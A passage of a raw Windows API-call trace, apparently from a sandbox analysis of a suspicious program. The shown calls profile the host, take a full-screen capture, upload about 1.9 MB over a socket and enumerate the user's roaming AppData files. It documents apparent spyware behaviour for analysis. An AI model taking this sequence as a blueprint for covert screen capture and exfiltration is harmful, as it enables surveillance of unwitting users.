(in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gdi32", cchWideChar=5, lpMultiByteStr=0x38f0a4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gdi32\x8e\x1b", lpUsedDefaultChar=0x0) returned 5 [0200.080] LoadLibraryA (lpLibFileName="gdi32") returned 0x77240000 [0200.102] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetDeviceCaps", cchWideChar=13, lpMultiByteStr=0x38f09c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDeviceCaps\x8f\x1b", lpUsedDefaultChar=0x0) returned 13 [0200.102] GetProcAddress (hModule=0x77240000, lpProcName="GetDeviceCaps") returned 0x77254de0 [0200.115] GetDeviceCaps (hdc=0x2b0100d1, index=10) returned 900 [0200.115] GetDeviceCaps (hdc=0x2b0100d1, index=117) returned 900 [0200.116] GdipReleaseDC (graphics=0x492230, hdc=0x2b0100d1) returned 0x0 [0200.116] GdipDeleteGraphics (graphics=0x492230) returned 0x0 [0200.176] GetSystemMetrics (nIndex=80) returned 1 [0200.230] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x4b40b36, dwData=0x0) returned 1 [0200.236] GetMonitorInfoW (in: hMonitor=0x10001, lpmi=0x38eec4 | out: lpmi=0x38eec4) returned 1 [0200.238] CreateDCW (pwszDriver="\\\\.\\DISPLAY1", pwszDevice=0x0, pszPort=0x0, pdm=0x0) returned 0x340107a3 [0200.242] GetDeviceCaps (hdc=0x340107a3, index=12) returned 32 [0200.243] GetDeviceCaps (hdc=0x340107a3, index=14) returned 1 [0200.243] DeleteDC (hdc=0x340107a3) returned 1 [0200.249] GetProcessWindowStation () returned 0x60 [0200.250] GetUserObjectInformationA (in: hObj=0x60, nIndex=1, pvInfo=0x26830fc, nLength=0xc, lpnLengthNeeded=0x38f094 | out: pvInfo=0x26830fc, lpnLengthNeeded=0x38f094) returned 1 [0200.250] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x5b8 [0201.276] CoCreateGuid (in: pguid=0x38e1c4 | out: pguid=0x38e1c4*(Data1=0x896b7f2d, Data2=0xe264, Data3=0x46db, Data4=([0]=0xbe, [1]=0x2d, [2]=0xb6, [3]=0x62, [4]=0x6c, [5]=0x80, [6]=0xb5, [7]=0xf7))) returned 0x0 [0201.443] GetCurrentProcess () returned 0xffffffff [0201.443] GetCurrentThread () returned 0xfffffffe [0201.443] GetCurrentProcess () returned 0xffffffff [0201.444] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x38f14c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x38f14c*=0x5e4) returned 1 [0201.444] GetCurrentThreadId () returned 0xf20 [0201.446] OleInitialize (pvReserved=0x0) returned 0x80010106 [0201.448] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0201.460] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x769b0000 [0201.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x400, lpWideCharStr="IsWow64Process", cchWideChar=14, lpMultiByteStr=0x38f0f8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IsWow64ProcessMqÔ\x96:lDþNrlô8", lpUsedDefaultChar=0x0) returned 14 [0201.461] GetProcAddress (hModule=0x769b0000, lpProcName="IsWow64Process") returned 0x769c193e [0201.461] GetCurrentProcess () returned 0xffffffff [0201.461] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x38f158 | out: Wow64Process=0x38f158*=1) returned 1 [0201.468] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f0f4 | out: phkResult=0x38f0f4*=0x5e8) returned 0x0 [0201.468] RegQueryValueExW (in: hKey=0x5e8, lpValueName="ProductName", lpReserved=0x0, lpType=0x38f114, lpData=0x0, lpcbData=0x38f110*=0x0 | out: lpType=0x38f114*=0x1, lpData=0x0, lpcbData=0x38f110*=0x2e) returned 0x0 [0201.469] RegQueryValueExW (in: hKey=0x5e8, lpValueName="ProductName", lpReserved=0x0, lpType=0x38f114, lpData=0x26fd478, lpcbData=0x38f110*=0x2e | out: lpType=0x38f114*=0x1, lpData="Windows 7 Professional", lpcbData=0x38f110*=0x2e) returned 0x0 [0201.469] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f0f4 | out: phkResult=0x38f0f4*=0x5ec) returned 0x0 [0201.469] RegQueryValueExW (in: hKey=0x5ec, lpValueName="CSDVersion", lpReserved=0x0, lpType=0x38f114, lpData=0x0, lpcbData=0x38f110*=0x0 | out: lpType=0x38f114*=0x0, lpData=0x0, lpcbData=0x38f110*=0x0) returned 0x2 [0201.483] CoCreateGuid (in: pguid=0x38ed9c | out: pguid=0x38ed9c*(Data1=0xaf78997c, Data2=0x5b8b, Data3=0x4a24, Data4=([0]=0xa4, [1]=0x69, [2]=0x30, [3]=0xa1, [4]=0xbf, [5]=0x9a, [6]=0x8b, [7]=0xd0))) returned 0x0 [0201.483] CoCreateGuid (in: pguid=0x38ece0 | out: pguid=0x38ece0*(Data1=0x5ce92de0, Data2=0x6e41, Data3=0x4a96, Data4=([0]=0xbc, [1]=0xd3, [2]=0xe3, [3]=0xa, [4]=0xad, [5]=0x7b, [6]=0x46, [7]=0xa2))) returned 0x0 [0202.233] send (s=0x268, buf=0x271d2ca*, len=727, flags=0) returned 727 [0202.234] recv (in: s=0x268, buf=0x25de0bc, len=8192, flags=0 | out: buf=0x25de0bc*) returned 125 [0202.318] GdipCreateFromHWND (hwnd=0x0, graphics=0x38f084) returned 0x0 [0202.319] GdipGetDC (graphics=0x492230, hdc=0x38f094) returned 0x0 [0202.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gdi32", cchWideChar=5, lpMultiByteStr=0x38f034, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gdi32\x8e\x1b", lpUsedDefaultChar=0x0) returned 5 [0202.319] LoadLibraryA (lpLibFileName="gdi32") returned 0x77240000 [0202.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetDeviceCaps", cchWideChar=13, lpMultiByteStr=0x38f02c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDeviceCaps\x8f\x1b", lpUsedDefaultChar=0x0) returned 13 [0202.320] GetProcAddress (hModule=0x77240000, lpProcName="GetDeviceCaps") returned 0x77254de0 [0202.320] GetDeviceCaps (hdc=0x2010b19, index=10) returned 900 [0202.320] GetDeviceCaps (hdc=0x2010b19, index=117) returned 900 [0202.320] GdipReleaseDC (graphics=0x492230, hdc=0x2010b19) returned 0x0 [0202.320] GdipDeleteGraphics (graphics=0x492230) returned 0x0 [0202.689] GdipCreateBitmapFromScan0 (width=1440, height=900, stride=0, format=0x26200a, scan0=0x0, bitmap=0x38f074) returned 0x0 [0202.811] GdipGetImagePixelFormat (image=0x492230, format=0x38f0f4) returned 0x0 [0202.811] GdipGetImageGraphicsContext (image=0x492230, graphics=0x38f100) returned 0x0 [0202.882] GdipSetInterpolationMode (graphics=0x492730, interpolationMode=0x4) returned 0x0 [0202.896] GdipSetPixelOffsetMode (graphics=0x492730, pixelOffsetMode=0x1) returned 0x0 [0202.896] GdipSetSmoothingMode (graphics=0x492730, smoothingMode=0x1) returned 0x0 [0203.168] GetDC (hWnd=0x0) returned 0x2f01093b [0203.231] GetCurrentObject (hdc=0x2f01093b, type=0x1) returned 0x1b00017 [0203.231] GetCurrentObject (hdc=0x2f01093b, type=0x2) returned 0x1900010 [0203.231] GetCurrentObject (hdc=0x2f01093b, type=0x7) returned 0x1050032 [0203.231] GetCurrentObject (hdc=0x2f01093b, type=0x6) returned 0x18a002e [0203.232] GdipGetDC (graphics=0x492730, hdc=0x38eff4) returned 0x0 [0203.326] BitBlt (hdc=0x3c010770, x=0, y=0, cx=1440, cy=900, hdcSrc=0x2f01093b, x1=0, y1=0, rop=0xcc0020) returned 1 [0203.349] GdipReleaseDC (graphics=0x492730, hdc=0x3c010770) returned 0x0 [0203.354] ReleaseDC (hWnd=0x0, hDC=0x2f01093b) returned 1 [0203.355] GdipDeleteGraphics (graphics=0x492730) returned 0x0 [0203.465] GdipGetImageEncodersSize (numEncoders=0x38f07c, size=0x38f078) returned 0x0 [0203.465] LocalAlloc (uFlags=0x0, uBytes=0x410) returned 0x5609560 [0203.466] GdipGetImageEncoders (in: numEncoders=0x5, size=0x410, encoders=0x5609560 | out: encoders=0x5609560) returned 0x0 [0203.470] LocalFree (hMem=0x5609560) returned 0x0 [0203.608] GdipSaveImageToStream (image=0x492230, stream=0x4d0030, clsidEncoder=0x38f08c*(Data1=0x557cf406, Data2=0x1a04, Data3=0x11d3, Data4=([0]=0x9a, [1]=0x73, [2]=0x0, [3]=0x0, [4]=0xf8, [5]=0x1e, [6]=0xf3, [7]=0x2e)), encoderParams=0x0) returned 0x0 [0204.680] CoCreateGuid (in: pguid=0x38edcc | out: pguid=0x38edcc*(Data1=0xab6506e7, Data2=0xf0dd, Data3=0x4c81, Data4=([0]=0x99, [1]=0xee, [2]=0x60, [3]=0x7d, [4]=0x9, [5]=0xf3, [6]=0x3e, [7]=0x28))) returned 0x0 [0204.680] CoCreateGuid (in: pguid=0x38ed10 | out: pguid=0x38ed10*(Data1=0x8542b3df, Data2=0x3ae7, Data3=0x432d, Data4=([0]=0x8b, [1]=0x62, [2]=0x45, [3]=0xac, [4]=0xc3, [5]=0xa9, [6]=0x3a, [7]=0x3a))) returned 0x0 [0204.884] send (s=0x268, buf=0x36c99b6*, len=65536, flags=0) returned 65536 [0204.885] send (s=0x268, buf=0x36d99b6*, len=65536, flags=0) returned 65536 [0205.068] send (s=0x268, buf=0x36e99b6*, len=65536, flags=0) returned 65536 [0205.157] send (s=0x268, buf=0x36f99b6*, len=65536, flags=0) returned 65536 [0205.195] send (s=0x268, buf=0x37099b6*, len=65536, flags=0) returned 65536 [0205.260] send (s=0x268, buf=0x37199b6*, len=65536, flags=0) returned 65536 [0205.311] send (s=0x268, buf=0x37299b6*, len=65536, flags=0) returned 65536 [0205.371] send (s=0x268, buf=0x37399b6*, len=65536, flags=0) returned 65536 [0205.431] send (s=0x268, buf=0x37499b6*, len=65536, flags=0) returned 65536 [0205.489] send (s=0x268, buf=0x37599b6*, len=65536, flags=0) returned 65536 [0205.546] send (s=0x268, buf=0x37699b6*, len=65536, flags=0) returned 65536 [0205.610] send (s=0x268, buf=0x37799b6*, len=65536, flags=0) returned 65536 [0205.669] send (s=0x268, buf=0x37899b6*, len=65536, flags=0) returned 65536 [0205.728] send (s=0x268, buf=0x37999b6*, len=65536, flags=0) returned 65536 [0205.820] send (s=0x268, buf=0x37a99b6*, len=65536, flags=0) returned 65536 [0205.859] send (s=0x268, buf=0x37b99b6*, len=65536, flags=0) returned 65536 [0205.921] send (s=0x268, buf=0x37c99b6*, len=65536, flags=0) returned 65536 [0205.977] send (s=0x268, buf=0x37d99b6*, len=65536, flags=0) returned 65536 [0206.041] send (s=0x268, buf=0x37e99b6*, len=65536, flags=0) returned 65536 [0206.114] send (s=0x268, buf=0x37f99b6*, len=65536, flags=0) returned 65536 [0206.169] send (s=0x268, buf=0x38099b6*, len=65536, flags=0) returned 65536 [0206.231] send (s=0x268, buf=0x38199b6*, len=65536, flags=0) returned 65536 [0206.296] send (s=0x268, buf=0x38299b6*, len=65536, flags=0) returned 65536 [0206.360] send (s=0x268, buf=0x38399b6*, len=65536, flags=0) returned 65536 [0206.413] send (s=0x268, buf=0x38499b6*, len=65536, flags=0) returned 65536 [0206.489] send (s=0x268, buf=0x38599b6*, len=65536, flags=0) returned 65536 [0206.532] send (s=0x268, buf=0x38699b6*, len=65536, flags=0) returned 65536 [0206.601] send (s=0x268, buf=0x38799b6*, len=65536, flags=0) returned 65536 [0206.657] send (s=0x268, buf=0x38899b6*, len=65536, flags=0) returned 65536 [0206.718] send (s=0x268, buf=0x38999b6*, len=34134, flags=0) returned 34134 [0206.786] recv (in: s=0x268, buf=0x25746cc, len=8192, flags=0 | out: buf=0x25746cc*) returned 125 [0207.216] CoTaskMemAlloc (cb=0x20c) returned 0x74a0f8 [0207.216] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x74a0f8 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x0 [0207.216] CoTaskMemFree (pv=0x74a0f8) [0207.217] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x38eacc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming", lpFilePart=0x0) returned 0x22 [0207.357] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efc4) returned 1 [0207.358] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x38eaa4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming", lpFilePart=0x0) returned 0x22 [0207.360] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\*", lpFindFileData=0x38ed74 | out: lpFindFileData=0x38ed74*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xc2889e40, ftLastAccessTime.dwHighDateTime=0x1d80713, ftLastWriteTime.dwLowDateTime=0xc2889e40, ftLastWriteTime.dwHighDateTime=0x1d80713, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0207.363] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xc2889e40, ftLastAccessTime.dwHighDateTime=0x1d80713, ftLastWriteTime.dwLowDateTime=0xc2889e40, ftLastWriteTime.dwHighDateTime=0x1d80713, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.364] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9923a90, ftCreationTime.dwHighDateTime=0x1d7d9e9, ftLastAccessTime.dwLowDateTime=0xbc84ca60, ftLastAccessTime.dwHighDateTime=0x1d7dca6, ftLastWriteTime.dwLowDateTime=0xbc84ca60, ftLastWriteTime.dwHighDateTime=0x1d7dca6, nFileSizeHigh=0x0, nFileSizeLow=0x5b84, dwReserved0=0x0, dwReserved1=0x0, cFileName="0TUcoykzt9i4cVI7E.mp4", cAlternateFileName="0TUCOY~1.MP4")) returned 1 [0207.364] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x28117600, ftCreationTime.dwHighDateTime=0x1d7e32f, ftLastAccessTime.dwLowDateTime=0x44463f30, ftLastAccessTime.dwHighDateTime=0x1d7e367, ftLastWriteTime.dwLowDateTime=0x44463f30, ftLastWriteTime.dwHighDateTime=0x1d7e367, nFileSizeHigh=0x0, nFileSizeLow=0x3440, dwReserved0=0x0, dwReserved1=0x0, cFileName="3gfYe.gif", cAlternateFileName="")) returned 1 [0207.364] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa97aaa70, ftCreationTime.dwHighDateTime=0x1d7e54d, ftLastAccessTime.dwLowDateTime=0xf0182920, ftLastAccessTime.dwHighDateTime=0x1d7e6c5, ftLastWriteTime.dwLowDateTime=0xf0182920, ftLastWriteTime.dwHighDateTime=0x1d7e6c5, nFileSizeHigh=0x0, nFileSizeLow=0x18387, dwReserved0=0x0, dwReserved1=0x0, cFileName="4GQV.wav", cAlternateFileName="")) returned 1 [0207.364] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6486b730, ftCreationTime.dwHighDateTime=0x1d7db3c, ftLastAccessTime.dwLowDateTime=0x28c8d800, ftLastAccessTime.dwHighDateTime=0x1d7e504, ftLastWriteTime.dwLowDateTime=0x28c8d800, ftLastWriteTime.dwHighDateTime=0x1d7e504, nFileSizeHigh=0x0, nFileSizeLow=0x11b9c, dwReserved0=0x0, dwReserved1=0x0, cFileName="7u touSvSeCy4 CVh7.bmp", cAlternateFileName="7UTOUS~1.BMP")) returned 1 [0207.364] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac0bdd80, ftCreationTime.dwHighDateTime=0x1d7df77, ftLastAccessTime.dwLowDateTime=0x8139f100, ftLastAccessTime.dwHighDateTime=0x1d7e33c, ftLastWriteTime.dwLowDateTime=0x8139f100, ftLastWriteTime.dwHighDateTime=0x1d7e33c, nFileSizeHigh=0x0, nFileSizeLow=0x16316, dwReserved0=0x0, dwReserved1=0x0, cFileName="8Zr5dm561R6yF-N.flv", cAlternateFileName="8ZR5DM~1.FLV")) returned 1 [0207.364] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6c4313b0, ftCreationTime.dwHighDateTime=0x1d7e479, ftLastAccessTime.dwLowDateTime=0xb46cd460, ftLastAccessTime.dwHighDateTime=0x1d7e775, ftLastWriteTime.dwLowDateTime=0xb46cd460, ftLastWriteTime.dwHighDateTime=0x1d7e775, nFileSizeHigh=0x0, nFileSizeLow=0x81a6, dwReserved0=0x0, dwReserved1=0x0, cFileName="97tgdA56mbkw.jpg", cAlternateFileName="97TGDA~1.JPG")) returned 1 [0207.364] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa389970, ftCreationTime.dwHighDateTime=0x1d7dd07, ftLastAccessTime.dwLowDateTime=0x93cc2d20, ftLastAccessTime.dwHighDateTime=0x1d7e00c, ftLastWriteTime.dwLowDateTime=0x93cc2d20, ftLastWriteTime.dwHighDateTime=0x1d7e00c, nFileSizeHigh=0x0, nFileSizeLow=0xfe62, dwReserved0=0x0, dwReserved1=0x0, cFileName="9oNuudsUMF.mp3", cAlternateFileName="9ONUUD~1.MP3")) returned 1 [0207.364] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x70f89bc0, ftCreationTime.dwHighDateTime=0x1d7dd42, ftLastAccessTime.dwLowDateTime=0xeb020120, ftLastAccessTime.dwHighDateTime=0x1d7e6c2, ftLastWriteTime.dwLowDateTime=0xeb020120, ftLastWriteTime.dwHighDateTime=0x1d7e6c2, nFileSizeHigh=0x0, nFileSizeLow=0x14988, dwReserved0=0x0, dwReserved1=0x0, cFileName="Blakmx5cf.bmp", cAlternateFileName="BLAKMX~1.BMP")) returned 1 [0207.364] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x58822e50, ftCreationTime.dwHighDateTime=0x1d7e506, ftLastAccessTime.dwLowDateTime=0x26367ad0, ftLastAccessTime.dwHighDateTime=0x1d7e5a8, ftLastWriteTime.dwLowDateTime=0x26367ad0, ftLastWriteTime.dwHighDateTime=0x1d7e5a8, nFileSizeHigh=0x0, nFileSizeLow=0xdadf, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bmqj.ots", cAlternateFileName="")) returned 1 [0207.364] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xe03daea9, ftCreationTime.dwHighDateTime=0x1ca041b, ftLastAccessTime.dwLowDateTime=0xe03daea9, ftLastAccessTime.dwHighDateTime=0x1ca041b, ftLastWriteTime.dwLowDateTime=0xb36110, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x45800, dwReserved0=0x0, dwReserved1=0x0, cFileName="cdieedr", cAlternateFileName="")) returned 1 [0207.364] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd2226850, ftCreationTime.dwHighDateTime=0x1d7d7e2, ftLastAccessTime.dwLowDateTime=0xc5cfb040, ftLastAccessTime.dwHighDateTime=0x1d7e22c, ftLastWriteTime.dwLowDateTime=0xc5cfb040, ftLastWriteTime.dwHighDateTime=0x1d7e22c, nFileSizeHigh=0x0, nFileSizeLow=0x8e47, dwReserved0=0x0, dwReserved1=0x0, cFileName="djB2F.mp3", cAlternateFileName="")) returned 1 [0207.364] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc8f6490, ftCreationTime.dwHighDateTime=0x1d7de21, ftLastAccessTime.dwLowDateTime=0x79a5fe00, ftLastAccessTime.dwHighDateTime=0x1d7e258, ftLastWriteTime.dwLowDateTime=0x79a5fe00, ftLastWriteTime.dwHighDateTime=0x1d7e258, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="DV6nAgU9wwwy.gif", cAlternateFileName="DV6NAG~1.GIF")) returned 1 [0207.364] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9607af90, ftCreationTime.dwHighDateTime=0x1d7e6ee, ftLastAccessTime.dwLowDateTime=0x9de64b50, ftLastAccessTime.dwHighDateTime=0x1d7e77e, ftLastWriteTime.dwLowDateTime=0x9de64b50, ftLastWriteTime.dwHighDateTime=0x1d7e77e, nFileSizeHigh=0x0, nFileSizeLow=0x30df, dwReserved0=0x0, dwReserved1=0x0, cFileName="EU5_6pxHq.bmp", cAlternateFileName="EU5_6P~1.BMP")) returned 1 [0207.364] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3ac5d7c0, ftCreationTime.dwHighDateTime=0x1d7e4ef, ftLastAccessTime.dwLowDateTime=0xfb5314d0, ftLastAccessTime.dwHighDateTime=0x1d7e51c, ftLastWriteTime.dwLowDateTime=0xfb5314d0, ftLastWriteTime.dwHighDateTime=0x1d7e51c, nFileSizeHigh=0x0, nFileSizeLow=0x3473, dwReserved0=0x0, dwReserved1=0x0, cFileName="fjvFtSGmOO6qqt.mp4", cAlternateFileName="FJVFTS~1.MP4")) returned 1 [0207.365] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x95275910, ftCreationTime.dwHighDateTime=0x1d7e048, ftLastAccessTime.dwLowDateTime=0x27eb6e60, ftLastAccessTime.dwHighDateTime=0x1d7e6c7, ftLastWriteTime.dwLowDateTime=0x27eb6e60, ftLastWriteTime.dwHighDateTime=0x1d7e6c7, nFileSizeHigh=0x0, nFileSizeLow=0x1d90, dwReserved0=0x0, dwReserved1=0x0, cFileName="fKZVRULqdlMALhdlRQ.gif", cAlternateFileName="FKZVRU~1.GIF")) returned 1 [0207.365] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf30404f0, ftCreationTime.dwHighDateTime=0x1d7ddf2, ftLastAccessTime.dwLowDateTime=0xf363a380, ftLastAccessTime.dwHighDateTime=0x1d7ded6, ftLastWriteTime.dwLowDateTime=0xf363a380, ftLastWriteTime.dwHighDateTime=0x1d7ded6, nFileSizeHigh=0x0, nFileSizeLow=0xfaa3, dwReserved0=0x0, dwReserved1=0x0, cFileName="g-vZ sPQr.swf", cAlternateFileName="G-VZSP~1.SWF")) returned 1 [0207.365] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x13f66860, ftCreationTime.dwHighDateTime=0x1d7e4dd, ftLastAccessTime.dwLowDateTime=0x9ababb0, ftLastAccessTime.dwHighDateTime=0x1d7e61b, ftLastWriteTime.dwLowDateTime=0x9ababb0, ftLastWriteTime.dwHighDateTime=0x1d7e61b, nFileSizeHigh=0x0, nFileSizeLow=0x18e7a, dwReserved0=0x0, dwReserved1=0x0, cFileName="gaK cAtTSPHBhSVXlO.avi", cAlternateFileName="GAKCAT~1.AVI")) returned 1 [0207.365] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x556785c0, ftCreationTime.dwHighDateTime=0x1d7de40, ftLastAccessTime.dwLowDateTime=0x1eaa98a0, ftLastAccessTime.dwHighDateTime=0x1d7e639, ftLastWriteTime.dwLowDateTime=0x1eaa98a0, ftLastWriteTime.dwHighDateTime=0x1d7e639, nFileSizeHigh=0x0, nFileSizeLow=0x1206a, dwReserved0=0x0, dwReserved1=0x0, cFileName="HgZ4-2ihg.flv", cAlternateFileName="HGZ4-2~1.FLV")) returned 1 [0207.365] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfef760a0, ftCreationTime.dwHighDateTime=0x1d7d766, ftLastAccessTime.dwLowDateTime=0xe65d3ea0, ftLastAccessTime.dwHighDateTime=0x1d7e0d7, ftLastWriteTime.dwLowDateTime=0xe65d3ea0, ftLastWriteTime.dwHighDateTime=0x1d7e0d7, nFileSizeHigh=0x0, nFileSizeLow=0x1168b, dwReserved0=0x0, dwReserved1=0x0, cFileName="I8lHReUPE9snzHBWNY.wav", cAlternateFileName="I8LHRE~1.WAV")) returned 1 [0207.365] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Identities", cAlternateFileName="IDENTI~1")) returned 1 [0207.365] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7f1abe30, ftCreationTime.dwHighDateTime=0x1d7df91, ftLastAccessTime.dwLowDateTime=0x55c46b00, ftLastAccessTime.dwHighDateTime=0x1d7e610, ftLastWriteTime.dwLowDateTime=0x55c46b00, ftLastWriteTime.dwHighDateTime=0x1d7e610, nFileSizeHigh=0x0, nFileSizeLow=0xf18f, dwReserved0=0x0, dwReserved1=0x0, cFileName="KvUS3F5sPJT9.png", cAlternateFileName="KVUS3F~1.PNG")) returned 1 [0207.365] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x426ba7c0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x426ba7c0, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0207.365] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc454b600, ftCreationTime.dwHighDateTime=0x1d7d7d9, 